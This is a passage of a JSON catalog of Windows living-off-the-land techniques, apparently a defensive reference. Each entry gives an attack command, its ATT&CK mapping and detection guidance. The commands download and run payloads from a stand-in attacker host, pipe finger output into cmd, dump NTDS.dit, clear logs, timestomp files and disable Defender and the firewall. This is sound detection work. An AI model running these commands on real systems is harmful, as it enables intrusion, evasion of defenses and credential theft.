C:\\Windows\\Temp\\x.exe:evil.exe","description":"Microsoft Defender's command-line utility (MpCmdRun.exe) downloads an arbitrary URL to disk with -DownloadFile (slashes or dashes both work), and can drop the file straight into an NTFS Alternate Data Stream. It is a signed AV binary, so the transfer blends in. Microsoft removed the flag in newer builds, but older platform copies remain abusable.","usecase":"Download a payload (optionally hidden in an ADS) using the trusted Defender binary itself.","mitre":["T1105","T1564.004"],"privilege":"user","detection":[{"type":"Detection","value":"MpCmdRun.exe with -DownloadFile/-url/-path; MpCmdRun.exe launched from a non-Defender directory or by an unexpected parent; network egress from MpCmdRun.exe to non-Microsoft hosts; -path containing ':' (ADS)."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/MpCmdRun.yml","https://www.bleepingcomputer.com/news/microsoft/microsoft-defender-can-ironically-be-used-to-download-malware/"],"added":true,"verifyNote":"LOLBAS MpCmdRun.yml quotes `-DownloadFile -url {REMOTEURL:.exe} -path {PATH:.exe}` (T1105, slashes/dashes both work) and the `-path {PATH}:evil.exe` ADS variant (T1564.004); match."},{"id":"daemon:desktopimgdownldr:22","toolId":"daemon:desktopimgdownldr","toolName":"desktopimgdownldr.exe","name":"Download","source":"DAEMON","platform":["Windows"],"capability":["File Download","Defense Evasion"],"nativeCategory":["Download"],"command":"set \"SYSTEMROOT=C:\\Windows\\Temp\" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://attacker.example/x.exe /eventName:desktopimgdownldr","description":"The Personalization CSP lock-screen tool downloads the URL given in /lockscreenurl to disk as a standard user. Overriding the SYSTEMROOT environment variable redirects the output to an attacker-chosen folder, and the PersonalizationCSP registry value seeded by the run can be deleted afterward to erase the trace.","usecase":"Download an arbitrary file with a native, signed Windows tool that is not certutil/bitsadmin.","mitre":["T1105"],"privilege":"user","detection":[{"type":"Detection","value":"desktopimgdownldr.exe with /lockscreenurl to a non-Microsoft host or fetching a non-image; SYSTEMROOT environment override before the run; writes/deletes at HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PersonalizationCSP\\LockScreenImageUrl."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Desktopimgdownldr.yml","https://www.sentinelone.com/labs/living-off-windows-land-a-new-native-file-downldr/"],"added":true,"verifyNote":"LOLBAS Desktopimgdownldr.yml quotes `set \"SYSTEMROOT=...\" && cmd /c desktopimgdownldr.exe /lockscreenurl:{REMOTEURL}` (T1105); SentinelOne write-up is the original research source."},{"id":"daemon:appinstaller:23","toolId":"daemon:appinstaller","toolName":"AppInstaller.exe","name":"Download","source":"DAEMON","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"start ms-appinstaller://?source=https://attacker.example/x.msix","description":"The ms-appinstaller:// URI is handled by the signed App Installer (AppInstaller.exe), which reaches out to the source URL, attempts to load/install the package, and caches the fetched file in INetCache. The download rides a trusted protocol handler with no obvious downloader on the command line; the same handler underpinned real-world MotW-bypass delivery campaigns.","usecase":"Download a remote file/package through a trusted URI handler rather than an explicit HTTP client.","mitre":["T1105"],"privilege":"user","detection":[{"type":"Detection","value":"AppInstaller.exe making outbound connections to non-Microsoft hosts; ms-appinstaller:// URI invocations (e.g. via explorer/start); files appearing in INetCache attributed to AppInstaller.exe; MSIX/APPX pulled from untrusted domains."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/AppInstaller.yml","https://attack.mitre.org/techniques/T1105/"],"added":true,"verifyNote":"LOLBAS AppInstaller.yml quotes `start ms-appinstaller://?source={REMOTEURL:.exe}` and notes the file is 'saved in INetCache' (T1105); match. ms-appinstaller MotW-bypass abuse is publicly documented (Microsoft disabled the handler in 2023)."},{"id":"daemon:onedrivestandaloneupdater:24","toolId":"daemon:onedrivestandaloneupdater","toolName":"OneDriveStandaloneUpdater.exe","name":"Download","source":"DAEMON","platform":["Windows"],"capability":["File Download","Defense Evasion"],"nativeCategory":["Download"],"command":"reg add \"HKCU\\Software\\Microsoft\\OneDrive\\UpdateOfficeConfig\" /v UpdateRingSettingURLFromOC /t REG_SZ /d https://attacker.example/x /f && OneDriveStandaloneUpdater.exe","description":"The signed OneDrive updater downloads from the URL stored in the user-writable registry value HKCU\\Software\\Microsoft\\OneDrive\\UpdateOfficeConfig\\UpdateRingSettingURLFromOC. Setting that value and launching the updater fetches an attacker-controlled file while the process command line stays completely benign.","usecase":"Download a file from the internet with a signed updater and no anomalous command-line arguments.","mitre":["T1105"],"privilege":"user","detection":[{"type":"Detection","value":"writes to HKCU\\Software\\Microsoft\\OneDrive\\UpdateOfficeConfig\\UpdateRingSettingURLFromOC; OneDriveStandaloneUpdater.exe connecting to hosts outside the official OneDrive/Office update CDNs."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/OneDriveStandaloneUpdater.yml","https://attack.mitre.org/techniques/T1105/"],"added":true,"verifyNote":"LOLBAS OneDriveStandaloneUpdater.yml documents downloading from the URL in HKCU\\...\\UpdateOfficeConfig\\UpdateRingSettingURLFromOC (T1105); match (LOLBAS also notes ODSUUpdateXMLUrlFromOC/UpdateXMLUrlFromOC must be non-empty)."},{"id":"daemon:finger:25","toolId":"daemon:finger","toolName":"finger.exe","name":"Download","source":"DAEMON","platform":["Windows"],"capability":["File Download","Execution"],"nativeCategory":["Download"],"command":"finger user@attacker.example | more +2 | cmd","description":"The built-in Finger client retrieves data from a remote Finger (TCP/79) server; piping the server's response through more and into cmd turns the response into executed commands, giving a combined download-and-execute (and C2) channel over an unusual port with a signed binary.","usecase":"Retrieve and run attacker-supplied commands/payload over the rarely-monitored finger protocol.","mitre":["T1105"],"privilege":"user","detection":[{"type":"Detection","value":"finger.exe making outbound TCP/79 connections to external hosts; finger.exe piped into cmd.exe/powershell.exe/more; any use of finger.exe at all, which is rare in modern environments."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Finger.yml","https://attack.mitre.org/techniques/T1105/"],"added":true,"verifyNote":"LOLBAS Finger.yml quotes `finger user@example.host.com | more +2 | cmd` verbatim (T1105, Download); exact match."},{"id":"daemon:wsl:26","toolId":"daemon:wsl","toolName":"wsl.exe","name":"Execute","source":"DAEMON","platform":["Windows","Linux"],"capability":["Execution","File Download"],"nativeCategory":["Execute","Download"],"command":"wsl.exe --exec bash -c \"id > /mnt/c/Windows/Temp/x\"\nwsl.exe --exec bash -c 'cat < /dev/tcp/10.10.10.10/54 > /tmp/x'","description":"wsl.exe (signed, present where WSL is installed) runs arbitrary Linux commands via --exec/-e (as root with -u root, no password), giving indirect command execution under a trusted binary. bash's /dev/tcp pulls files with no external tool. wsl.exe also resolves its install path from HKLM\\...\\Lxss\\MSI\\InstallLocation, so a planted wsl.exe there is executed instead of the legitimate one.","usecase":"Execute payloads on the Linux side (evading Windows EDR), transfer files via /dev/tcp, or masquerade a payload as WSL.","mitre":["T1202","T1105","T1218"],"privilege":"user","detection":[{"type":"Detection","value":"wsl.exe with -e/--exec/-u root; wsl.exe/bash.exe spawning children outside System32; changes to HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Lxss\\MSI\\InstallLocation; /dev/tcp usage inside WSL bash."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Wsl.yml","https://attack.mitre.org/techniques/T1202/"],"added":true,"verifyNote":"LOLBAS Wsl.yml documents `wsl.exe --exec bash -c \"{CMD}\"` (T1202), `wsl.exe --exec bash -c 'cat < /dev/tcp/.../.. > binary'` (T1105), and the HKLM\\...\\Lxss\\MSI\\InstallLocation lookup; match."},{"id":"daemon:winget:27","toolId":"daemon:winget","toolName":"winget.exe","name":"Execute","source":"DAEMON","platform":["Windows"],"capability":["Execution","AWL / Policy Bypass"],"nativeCategory":["Execute","AWL Bypass"],"command":"winget.exe install --manifest C:\\Windows\\Temp\\x.yml\nwinget.exe install --accept-package-agreements -s msstore {StoreID}","description":"The Windows Package Manager installs from a local manifest (--manifest) whose Installer URL points at an arbitrary file that is then downloaded and executed, or installs a Microsoft Store package by ID even when the Store app is blocked and AppLocker is active. Either path fetches and runs code through a signed installer, bypassing application-control policy.","usecase":"Download-and-execute an arbitrary installer, or pull software from the Store, past AppLocker/Store restrictions.","mitre":["T1105","T1218"],"privilege":"user","detection":[{"type":"Detection","value":"winget.exe install --manifest referencing a local/temp .yml; winget pulling installers from non-standard hosts; msstore installs where the Store app is policy-blocked; winget-spawned installer processes writing to unusual locations."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Winget.yml","https://learn.microsoft.com/en-us/windows/package-manager/winget/install"],"added":true,"verifyNote":"LOLBAS Winget.yml quotes `winget.exe install --manifest {PATH:.yml}` (download+execute, T1105) and `winget.exe install --accept-package-agreements -s msstore {name/ID}` (AWL Bypass, installs even if Store app blocked); match."},{"id":"daemon:devtunnel:28","toolId":"daemon:devtunnel","toolName":"devtunnel.exe","name":"Download","source":"DAEMON","platform":["Windows","Linux","macOS"],"capability":["File Upload","File Download"],"nativeCategory":["Download","Upload","Exfiltration"],"command":"devtunnel.exe host -p 8080","description":"The Microsoft Dev Tunnels agent (signed) exposes a local port/service on a Microsoft-hosted public *.devtunnels.ms URL. This creates an ingress/egress channel that can be used to reach internal services, stage tooling, or exfiltrate data, with the traffic riding trusted Microsoft tunneling infrastructure.","usecase":"Establish a trusted-domain tunnel for data transfer, exfiltration, or exposing an internal service to the internet.","mitre":["T1105","T1572","T1567"],"privilege":"user","detection":[{"type":"Detection","value":"devtunnel.exe execution and persistent connections to *.devtunnels.ms / global.rel.tunnels.api.visualstudio.com; internal services becoming reachable via a Microsoft tunnel domain; unexpected long-lived outbound sessions from devtunnel.exe."}],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/devtunnels/","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/cli-commands"],"added":true,"verifyNote":"Microsoft Learn CLI reference documents `devtunnel host -p 3000` exposing a local port at a public *.devtunnels.ms URL; LOLBAS entry exists at OtherMSBinaries/devtunnels/ (reference URL corrected from the 404ing raw-YAML path to the working LOLBAS site page + MS Learn)."},{"id":"daemon:teams:29","toolId":"daemon:teams","toolName":"Teams.exe","name":"Execute","source":"DAEMON","platform":["Windows","macOS","Linux"],"capability":["Execution","Defense Evasion"],"nativeCategory":["Execute"],"command":"Teams.exe --disable-gpu-sandbox --gpu-launcher=\"C:\\Windows\\Temp\\x.exe &&\"","description":"Classic Microsoft Teams is an Electron/Chromium app, and the Chromium --gpu-launcher switch runs an arbitrary command as a child of the signed Teams binary (system binary proxy execution / parent masquerading). The same abuse applies to other Electron apps, and Teams can also be made to run planted JavaScript from its app.asar/package.json.","usecase":"Proxy-execute a command under a trusted, signed Electron binary to blend with normal process trees.","mitre":["T1218.015"],"privilege":"user","detection":[{"type":"Detection","value":"Teams.exe (or any Electron app) launched with --gpu-launcher/--disable-gpu-sandbox/--utility-cmd-prefix; Teams.exe spawning cmd.exe/powershell.exe; unexpected writes to app.asar or package.json under %LOCALAPPDATA%\\Microsoft\\Teams."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Teams.yml","https://attack.mitre.org/techniques/T1218/015/"],"added":true,"verifyNote":"LOLBAS Teams.yml quotes `teams.exe --disable-gpu-sandbox --gpu-launcher=\"{CMD} &&\"` and the app.asar/package.json JavaScript variants, all MitreID T1218.015 (Electron Applications); match."},{"id":"daemon:diskshadow:30","toolId":"daemon:diskshadow","toolName":"diskshadow.exe","name":"Execute","source":"DAEMON","platform":["Windows"],"capability":["Execution","Credential Access"],"nativeCategory":["Execute","Dump"],"command":"diskshadow.exe /s C:\\Windows\\Temp\\x.txt","description":"diskshadow's script mode (/s) runs each line of a text script; an exec line spawns a child process under a signed binary (indirect execution), while its VSS commands (set/create/expose) snapshot a volume so locked files like NTDS.dit or the SAM/SYSTEM hives can be copied out of the shadow copy. One signed tool covers both proxy execution and credential-store theft.","usecase":"Proxy-execute a command and/or snapshot the volume to copy NTDS.dit and registry hives for offline credential extraction.","mitre":["T1202","T1003.003"],"privilege":"admin","detection":[{"type":"Detection","value":"diskshadow.exe /s with a script file; diskshadow creating/exposing shadow copies; child processes spawned by diskshadow.exe; reads of NTDS.dit or SAM/SYSTEM via a shadow-copy path shortly after a snapshot."}],"references":["https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Diskshadow.yml","https://attack.mitre.org/techniques/T1003/003/"],"added":true,"verifyNote":"LOLBAS Diskshadow.yml documents `diskshadow.exe /s {PATH:.txt}` (T1003.003, NTDS exfil via VSS) and `exec {PATH:.exe}` child-process spawn (T1202); FIX: removed T1006 — not in the LOLBAS mapping and diskshadow's VSS snapshot is squarely T1003.003, so only T1202+T1003.003 are retained."},{"id":"daemon:wevtutil:31","toolId":"daemon:wevtutil","toolName":"wevtutil.exe","name":"Indicator Removal","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Indicator Removal","Clear Windows Event Logs"],"command":"wevtutil cl Security","description":"The built-in event log utility clears (empties) a named Windows Event Log channel with the cl / clear-log verb, destroying recorded evidence. An optional /bu: switch backs the log up first; adversaries omit it.","usecase":"Erase Security/System/Application logs after intrusion activity to remove indicators of compromise.","mitre":["T1070.001"],"privilege":"admin","detection":[{"type":"Detection","value":"Alert on Security Event ID 1102 (audit log cleared) and System 104 (log file cleared). Log process creation (Sysmon 1 / Security 4688) for wevtutil.exe with 'cl' or 'clear-log' arguments; forward events to a SIEM so cleared local copies still survive centrally."}],"references":["https://attack.mitre.org/techniques/T1070/001/","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil"],"added":true,"verifyNote":"MS Learn wevtutil doc confirms 'cl|clear-log <Logname> [/bu:<Backup>]' clears a log (docs example: wevtutil cl Application /bu:...); maps to ATT&CK T1070.001. No change."},{"id":"daemon:wevtutil:32","toolId":"daemon:wevtutil","toolName":"wevtutil.exe","name":"Impair Defenses","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Impair Defenses","Disable Windows Event Logging"],"command":"wevtutil sl Security /e:false","description":"The set-log (sl) verb with /e:false disables a Windows Event Log channel so future events for that channel are no longer written, blinding defenders without clearing existing entries.","usecase":"Disable Security or PowerShell operational channels before running noisy tooling so nothing is recorded.","mitre":["T1562.002","T1070.001"],"privilege":"admin","detection":[{"type":"Detection","value":"Monitor process creation (Sysmon 1 / 4688) for wevtutil.exe with 'sl' plus '/e:false'. Watch Event ID 1100/1102/4719 (audit policy or log service state change) and alert on any channel being disabled, especially Security, System, and Microsoft-Windows-PowerShell/Operational."}],"references":["https://attack.mitre.org/techniques/T1562/002/","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil"],"added":true,"verifyNote":"MS Learn wevtutil doc confirms 'sl|set-log' with '/e:<Enabled>' where Enabled is true or false ('Enables or disables a log'); primary ATT&CK ID T1562.002 is accurate (T1070.001 is a related secondary tag). No change."},{"id":"daemon:powershell:33","toolId":"daemon:powershell","toolName":"Clear-EventLog","name":"Indicator Removal","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Indicator Removal","Clear Windows Event Logs"],"command":"Clear-EventLog -LogName Security","description":"The Windows PowerShell 5.1 Clear-EventLog cmdlet deletes all entries from a specified classic event log on a local or remote computer, an alternative to wevtutil for the same log-clearing effect.","usecase":"Clear event logs from within an existing PowerShell session without spawning wevtutil.exe.","mitre":["T1070.001"],"privilege":"admin","detection":[{"type":"Detection","value":"Alert on Event ID 1102/104 as with any clear. Enable PowerShell Script Block Logging (4104) and Module Logging to capture the Clear-EventLog invocation; correlate with Sysmon 1 for powershell.exe. Sysmon's own channel typically survives a Security-log clear and preserves the trail."}],"references":["https://attack.mitre.org/techniques/T1070/001/","https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/clear-eventlog"],"added":true,"verifyNote":"MS Learn confirms Clear-EventLog 'deletes all of the entries from the specified event logs on the local computer or on remote computers' (classic-log cmdlet, requires Administrators); ATT&CK T1070.001. No change."},{"id":"daemon:powershell:34","toolId":"daemon:powershell","toolName":"Remove-EventLog","name":"Indicator Removal","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Indicator Removal","Clear Windows Event Logs"],"command":"Remove-EventLog -LogName Security","description":"The Windows PowerShell 5.1 Remove-EventLog cmdlet deletes a classic event log entirely and unregisters its event sources, which can suppress future logging for that log until it is recreated (often after reboot).","usecase":"Delete and deregister a log so the intrusion leaves less evidence and future events are not captured.","mitre":["T1070.001"],"privilege":"admin","detection":[{"type":"Detection","value":"Capture the cmdlet via Script Block Logging (4104) and Sysmon 1 for powershell.exe. Baseline the expected set of registered event logs and alert when a standard log (Security, System, Application) is missing or its sources are deregistered."}],"references":["https://attack.mitre.org/techniques/T1070/001/","https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/remove-eventlog?view=powershell-5.1"],"added":true,"verifyNote":"MS Learn (PS 5.1) confirms Remove-EventLog 'deletes an event log file ... and unregisters all its event sources'; classic EventLog cmdlet (5.1 only, not PS7). No change."},{"id":"daemon:auditpol:35","toolId":"daemon:auditpol","toolName":"auditpol.exe","name":"Impair Defenses","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Impair Defenses","Disable Windows Event Logging"],"command":"auditpol /set /category:\"System\" /success:disable /failure:disable","description":"The built-in audit policy tool sets a subcategory or category to stop generating success/failure audit events; auditpol /clear /y wipes the entire advanced audit policy. Either action suppresses the events defenders rely on.","usecase":"Turn off auditing for noisy categories (e.g. process creation, logon) before operating, so key telemetry is never written.","mitre":["T1562.002"],"privilege":"admin","detection":[{"type":"Detection","value":"Alert on Event ID 4719 (System audit policy was changed) and 4907. Log process creation for auditpol.exe with '/set ... /success:disable', '/failure:disable', '/clear', or '/remove'. Periodically compare live 'auditpol /get /category:*' output against a known-good baseline."}],"references":["https://attack.mitre.org/techniques/T1562/002/","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/auditpol"],"added":true,"verifyNote":"MS Learn auditpol-set confirms '/set ... /category:<name> /success:<enable|disable> /failure:<enable|disable>' and auditpol '/clear'/'/remove' sub-commands; ATT&CK T1562.002. No change."},{"id":"daemon:fsutil:36","toolId":"daemon:fsutil","toolName":"fsutil.exe","name":"Indicator Removal","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Indicator Removal","Delete Volume USN Journal"],"command":"fsutil usn deletejournal /d C:","description":"The fsutil usn deletejournal subcommand with /d disables the NTFS Update Sequence Number (USN) change journal on a volume and deletes its records, destroying a key forensic timeline of file creation, deletion, and modification.","usecase":"Wipe the NTFS change journal to hamper forensic reconstruction of file-level activity on a compromised host.","mitre":["T1070"],"privilege":"admin","detection":[{"type":"Detection","value":"Log process creation (Sysmon 1 / 4688) for fsutil.exe with 'usn' and 'deletejournal'. During forensics, a reset USN journal ID or an abrupt discontinuity/gap in journal records indicates deletion; ship file-audit and journal data off-host in near real time."}],"references":["https://attack.mitre.org/techniques/T1070/","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn"],"added":true,"verifyNote":"MS Learn fsutil-usn confirms 'fsutil usn deletejournal {/d|/n} <volumepath>' with '/d' disabling the active USN change journal (docs example: fsutil usn deletejournal /d c:); ATT&CK T1070. No change."},{"id":"daemon:attrib:37","toolId":"daemon:attrib","toolName":"attrib.exe","name":"Hide Artifacts","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Hide Artifacts","Hidden Files and Directories"],"command":"attrib +h +s C:\\Windows\\Temp\\x\\payload.exe","description":"The built-in attrib command sets the Hidden (+h) and System (+s) file attributes so a file is concealed from default Explorer and 'dir' views, a simple way to hide dropped artifacts on disk.","usecase":"Conceal a dropped executable or staging file from casual inspection of a directory.","mitre":["T1564.001"],"privilege":"user","detection":[{"type":"Detection","value":"Log process creation (Sysmon 1 / 4688) for attrib.exe with '+h' and especially '+s' on files in user-writable paths (Temp, ProgramData, AppData). Hunt the file system for files carrying both Hidden and System attributes in atypical locations."}],"references":["https://attack.mitre.org/techniques/T1564/001/","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/attrib"],"added":true,"verifyNote":"MS Learn attrib doc confirms '{+|-}h' sets the Hidden and '{+|-}s' sets the System file attribute; ATT&CK T1564.001. No change."},{"id":"daemon:powershell:38","toolId":"daemon:powershell","toolName":"PowerShell","name":"Indicator Removal","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Indicator Removal","Timestomp"],"command":"$(Get-Item C:\\Windows\\Temp\\x\\payload.exe).LastWriteTime = '01/01/2016 00:00:00'; [IO.File]::SetCreationTime('C:\\Windows\\Temp\\x\\payload.exe','01/01/2016')","description":"PowerShell can rewrite a file's $STANDARD_INFORMATION timestamps via the .CreationTime/.LastWriteTime/.LastAccessTime properties of a FileInfo object or the [System.IO.File]::SetCreationTime/SetLastWriteTime .NET methods, blending a malicious file in with legitimate neighbors (timestomping).","usecase":"Backdate or match a dropped file's MACE timestamps to defeat timeline analysis and 'recently modified' triage.","mitre":["T1070.006"],"privilege":"user","detection":[{"type":"Detection","value":"Sysmon Event ID 2 (FileCreateTime changed) flags user-mode $SI edits. Capture Script Block Logging (4104) for '.CreationTime =', '.LastWriteTime =', '[IO.File]::SetCreationTime', etc. In MFT forensics, a $STANDARD_INFORMATION timestamp earlier than the matching $FILE_NAME timestamp is a classic timestomp signature."}],"references":["https://attack.mitre.org/techniques/T1070/006/","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"],"added":true,"verifyNote":"MS Learn .NET docs confirm System.IO.File.SetCreationTime/SetLastWriteTime and the FileInfo LastWriteTime/CreationTime settable properties; Atomic Red Team T1070.006 documents PowerShell timestomp; ATT&CK T1070.006. No change."},{"id":"daemon:powershell:39","toolId":"daemon:powershell","toolName":"Add-MpPreference","name":"Impair Defenses","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Impair Defenses","Disable or Modify Tools"],"command":"Add-MpPreference -ExclusionPath 'C:\\Windows\\Temp\\x'\nAdd-MpPreference -ExclusionProcess 'C:\\Windows\\Temp\\x\\payload.exe'\nAdd-MpPreference -ExclusionExtension 'exe'","description":"The Defender module's Add-MpPreference cmdlet adds entries to the Microsoft Defender Antivirus exclusion list so matching items are no longer scanned in real time or on schedule: -ExclusionPath excludes a folder/file, -ExclusionProcess excludes any files opened by a named process, and -ExclusionExtension excludes an entire file type. Any of the three carves a blind spot for staging and executing tooling.","usecase":"Carve a Defender blind spot by excluding a staging path, an attacker process, or a whole extension before dropping tooling.","mitre":["T1562.001"],"privilege":"admin","detection":[{"type":"Detection","value":"Monitor Defender Operational Event ID 5007 (configuration changed) and registry writes under HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\{Paths|Processes|Extensions} (Sysmon 13). Capture Add-MpPreference via Script Block Logging (4104) and alert on any new exclusion, especially paths/processes in Temp/AppData/ProgramData and extension-wide exclusions (rarely legitimate on endpoints). Enable Tamper Protection and centrally alert on exclusion drift."}],"references":["https://attack.mitre.org/techniques/T1562/001/","https://learn.microsoft.com/en-us/powershell/module/defender/add-mppreference"],"added":true,"verifyNote":"MERGED from three near-duplicate Add-MpPreference exclusion entries (same toolId + same command intent — adding a Defender AV exclusion, all T1562.001). MS Learn confirms -ExclusionPath ('disables Windows Defender scheduled and real-time scanning for files in this folder'), -ExclusionProcess ('excludes any files opened by the processes that you specify'), and -ExclusionExtension ('exclude from scheduled, custom, and real-time scanning'); the three write to the Exclusions Paths/Processes/Extensions registry subkeys respectively. Technique mapping unchanged."},{"id":"daemon:powershell:40","toolId":"daemon:powershell","toolName":"Set-MpPreference","name":"Impair Defenses","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Impair Defenses","Disable or Modify Tools"],"command":"Set-MpPreference -DisableRealtimeMonitoring $true","description":"The Defender module's Set-MpPreference cmdlet with -DisableRealtimeMonitoring $true turns off Microsoft Defender Antivirus real-time protection, stopping on-access scanning of files and processes host-wide.","usecase":"Disable real-time protection so subsequent malicious files execute without being scanned or quarantined.","mitre":["T1562.001"],"privilege":"admin","detection":[{"type":"Detection","value":"Alert on Defender Operational Event ID 5001 (real-time protection disabled) and 5007/5010. Capture 'Set-MpPreference -DisableRealtimeMonitoring' and related '-Disable*' toggles via Script Block Logging (4104). Enable Tamper Protection, which blocks this change and logs the attempt."}],"references":["https://attack.mitre.org/techniques/T1562/001/","https://learn.microsoft.com/en-us/powershell/module/defender/set-mppreference"],"added":true,"verifyNote":"MS Learn confirms Set-MpPreference -DisableRealtimeMonitoring (Boolean) governs real-time protection; Defender Operational Event ID 5001 (real-time protection disabled) / 5007 (config changed) confirmed via Microsoft community/Sentinel guidance; ATT&CK T1562.001. No change."},{"id":"daemon:reg:41","toolId":"daemon:reg","toolName":"reg.exe","name":"Impair Defenses","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Impair Defenses","Modify Registry"],"command":"reg add \"HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\" /v DisableAntiSpyware /t REG_DWORD /d 1 /f","description":"The built-in reg.exe writes the legacy DisableAntiSpyware policy value to turn off Microsoft Defender Antivirus via the registry. Modern Windows blocks or ignores this value under Tamper Protection, but the write attempt itself is a well-known evasion indicator.","usecase":"Attempt to disable Defender through a policy registry key rather than the Defender cmdlets.","mitre":["T1562.001","T1112"],"privilege":"admin","detection":[{"type":"Detection","value":"Monitor registry writes to HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\DisableAntiSpyware (Sysmon 13) and process creation for reg.exe targeting that key. Tamper Protection generates Defender Event ID 5007 on the blocked attempt; treat any DisableAntiSpyware write as malicious on managed endpoints."}],"references":["https://attack.mitre.org/techniques/T1562/001/","https://learn.microsoft.com/en-us/windows-hardware/customize/desktop/unattend/security-malware-windows-defender-disableantispyware"],"added":true,"verifyNote":"MS Learn DisableAntiSpyware doc confirms the value disables Defender AV and that it is now ignored/removed on modern Windows and protected by Tamper Protection (platform 4.18.2108.4+) - matching the entry's caveat; reg.exe add /v /t REG_DWORD /d /f is standard; ATT&CK T1562.001 + T1112. No change."},{"id":"daemon:netsh:42","toolId":"daemon:netsh","toolName":"netsh.exe","name":"Impair Defenses","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Impair Defenses","Disable or Modify System Firewall"],"command":"netsh advfirewall set allprofiles state off","description":"The built-in netsh advfirewall context sets the state of all Windows Defender Firewall profiles (Domain, Private, Public) to off, removing host-based network controls that would otherwise limit inbound/outbound activity.","usecase":"Turn off the host firewall to allow attacker tooling, C2, or lateral-movement traffic unimpeded.","mitre":["T1562.004"],"privilege":"admin","detection":[{"type":"Detection","value":"Log process creation (Sysmon 1 / 4688) for netsh.exe with 'advfirewall' and 'state off'. Alert on Windows Firewall Event ID 2003 (a firewall setting was changed) and 2009. Also watch sc.exe/net.exe targeting the MpsSvc service. Enforce firewall state centrally via GPO/Intune and alert on drift."}],"references":["https://attack.mitre.org/techniques/T1562/004/","https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/netsh-advfirewall"],"added":true,"verifyNote":"MS Learn netsh-advfirewall doc confirms 'netsh advfirewall set [allprofiles|...] state <on|off|notconfigured>' where off 'Disables the firewall'; Windows Firewall Event ID 2003 (profile setting changed) confirmed; ATT&CK T1562.004. No change."},{"id":"daemon:byovd:43","toolId":"daemon:byovd","toolName":"BYOVD (vulnerable driver)","name":"Impair Defenses","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion","Privilege Escalation"],"nativeCategory":["Impair Defenses","Bring Your Own Vulnerable Driver"],"command":"# BYOVD is documented here as a NAMED concept only. No exploitation steps are provided. Reference the LOLDrivers catalog for known-vulnerable signed drivers and the vendor blocklist for defensive coverage.","description":"Bring Your Own Vulnerable Driver (BYOVD) is a named, publicly-documented class of technique in which an adversary who already holds local administrator rights loads a legitimately signed but known-vulnerable kernel driver, then abuses that driver's flaw to gain kernel-mode code execution and disable or blind EDR/AV. This entry catalogs the concept and detection surface only; it contains no driver-exploitation procedure.","usecase":"Understand and detect kernel-level tampering where a signed vulnerable driver is used to kill or blind security tooling.","mitre":["T1068","T1562.001"],"privilege":"admin","detection":[{"type":"Detection","value":"Monitor Sysmon Event ID 6 (driver loaded) and Security 4697/System 7045 (new kernel-mode service) for drivers matching LOLDrivers hashes/signatures or loading from user-writable paths. Enforce the Microsoft Vulnerable Driver Blocklist and WDAC/HVCI to block known-bad drivers. Alert on unexpected drivers signed by unrelated third parties on servers/workstations."}],"references":["https://attack.mitre.org/techniques/T1068/","https://www.loldrivers.io/"],"added":true,"verifyNote":"Concept-only (no exploit steps); LOLDrivers.io is the canonical public catalog of known-vulnerable signed drivers and ATT&CK T1068 (Exploitation for Priv-Esc) + T1562.001 map to BYOVD; Sysmon 6 / Security 4697 / System 7045 detection is accurate. No change."},{"id":"daemon:powershell:44","toolId":"daemon:powershell","toolName":"Clear-History","name":"Indicator Removal","source":"DAEMON","platform":["Windows"],"capability":["Defense Evasion"],"nativeCategory":["Indicator Removal","Clear Command History"],"command":"Clear-History; Remove-Item (Get-PSReadlineOption).HistorySavePath","description":"Clear-History flushes the current PowerShell session's in-memory history, while deleting the PSReadLine save path (ConsoleHost_history.txt) removes the persistent, cross-session command history; Set-PSReadLineOption -HistorySaveStyle SaveNothing disables future history writes. Together these hide the commands an operator ran.","usecase":"Erase both session and persistent PowerShell command history to conceal executed 